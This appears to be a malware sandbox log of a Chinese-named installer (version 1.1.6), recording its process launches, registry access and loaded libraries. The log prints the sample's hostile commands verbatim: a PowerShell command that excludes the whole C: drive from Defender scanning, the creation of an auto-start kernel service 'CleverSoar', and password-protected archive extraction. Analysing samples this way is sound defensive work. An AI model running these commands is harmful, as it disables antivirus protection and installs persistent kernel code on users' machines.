Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3448:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1136:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3152:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6440:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5548:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | File created: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Virustotal: Detection: 11%
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Process created: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Process created: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp "C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$302A2,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Process created: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Process created: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp "C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$302A2,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
